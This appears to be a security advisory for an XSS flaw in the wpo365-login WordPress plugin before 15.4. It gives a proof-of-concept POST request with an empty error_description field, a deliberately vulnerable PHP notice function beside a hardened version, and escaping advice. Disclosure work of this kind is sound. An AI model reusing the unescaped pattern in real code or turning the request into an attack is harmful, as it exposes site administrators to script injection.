The plugin does not sanitise error descriptions before outputting them in the log notice, which could allow unauthenticated users to perform Cross-Site Scripting attacks against a logged-in administrator.
```http
POST / HTTP/1.1
Content-Length: 242
Content-Type: application/x-www-form-urlencoded

error=2&error_description=&error_uri=https%3A%2F%2Flogin.microsoftonline.com%2Ferror%3Fcode%3D700054&state=https%3A%2F%2F192.168.88.176%2Fwp-login.php%3Flogin_errors%3DCHECK_LOG2
```
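The root cause is an HTML-context output of a request-controlled value. The following is an added example, not the plugin's own code, showing the unsanitised pattern beside a hardened version using WordPress's standard escaping helpers; the function names and the `hypothetical_error_log` option name are assumptions for illustration.

```php
<?php
// Added example, not code from the wpo365-login plugin. Function names and the
// option name below are hypothetical.

// Vulnerable pattern: the attacker-controlled error_description parameter is
// concatenated into the notice markup unescaped, so any HTML or script in it is
// rendered in the administrator's browser when the notice is displayed.
function hypothetical_render_error_notice_unsafe( array $request ) {
    $description = isset( $request['error_description'] ) ? $request['error_description'] : '';
    return '<div class="notice notice-error"><p>Login error: ' . $description . '</p></div>';
}

// Hardened pattern: strip slashes and control characters from the value, then
// escape it for an HTML context at the point of output. esc_html() converts
// <, >, &, " and ' to entities, so markup is shown as text rather than executed.
function hypothetical_render_error_notice_safe( array $request ) {
    $description = isset( $request['error_description'] )
        ? sanitize_text_field( wp_unslash( $request['error_description'] ) )
        : '';
    return '<div class="notice notice-error"><p>Login error: ' . esc_html( $description ) . '</p></div>';
}

// When the value is stored in a log and shown later, escape at display time
// (the HTML context), not only when it is stored, and restrict the notice to
// users who are allowed to see it.
add_action( 'admin_notices', function () {
    if ( ! current_user_can( 'manage_options' ) ) {
        return;
    }
    // Hypothetical option holding previously logged error descriptions.
    $entries = get_option( 'hypothetical_error_log', array() );
    foreach ( (array) $entries as $entry ) {
        echo '<div class="notice notice-error"><p>' . esc_html( (string) $entry ) . '</p></div>';
    }
} );
```

Values that end up in other contexts need the matching escaper: a link built from `error_uri` should go through `esc_url()`, and a value placed in an attribute through `esc_attr()`; escaping once with the wrong function for the context does not prevent injection.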
CPE

| Name | Operator | Version |
|---|---|---|
| wpo365-login | lt | 15.4 |